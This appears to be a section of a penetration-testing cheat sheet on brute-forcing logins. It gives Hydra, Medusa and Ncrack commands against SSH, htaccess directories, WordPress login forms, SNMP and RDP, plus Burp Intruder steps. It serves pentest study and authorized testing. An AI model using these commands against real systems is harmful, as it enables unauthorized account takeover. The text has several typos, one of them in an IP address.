Online password cracking
There are several tools specialized for bruteforcing online. There are several different services that are common for bruteforce. For example: VNC, SSH, FTP, SNMP, POP3, HTTP.
Port 22 - SSH
hydra -l root -P wordlist.txt 192.168.0.101 ssh
hydra -L userlist.txt -P best1050.txt 192.168.1.103 -s 22 ssh -V
Port 80/443 htaccess
You can password protect directories with apache pretty easily. Just configure the htaccess (I exaplin this in the chapter on Common ports).
It can then be brute forced like this:
medusa -h 192.168.1.101 -u admin -P wordlist.txt -M http -m DIR:/test -T 10
Logins
Use Burp Suite
- Intecept a login attempt.
- Modify the user field with ^USER^ and the password field with ^PASS^
- Grab the post request path (/wp-login.php)
- Grab the modified login request (last field in request)
Should be able to populate like below
hydra -l username -P wordlist.txt TARGETIPADDRESS http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In
Send a fake request to the site and grab any text indicators of an invalid request (is incorrect in example below)
Append to the end of the hydra syntax and close double quote
hydra -l username -P wordlist.txt TARGETIPADDRESS http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:is incorrect"
Use Burp Pro suite. (Can be performed in free but is ridiculously slow)
- Intecept a login attempt.
- Right-lick "Send to intruder". Select Sniper if you have only one field you want to bruteforce. If you for example already know the username. Otherwise select cluster-attack.
- Select your payload, your wordlist.
- Click attack.
- Look for response-length that differs from the rest.
Port 161 - SNMP
hydra -P wordlist.txt -v 102.168.0.101 snmp
Port 3389 - Remote Desktop Protocol
For RDP we can use Ncrack.
ncrack -vv --user admin -P password-file.txt rdp://192.168.0.101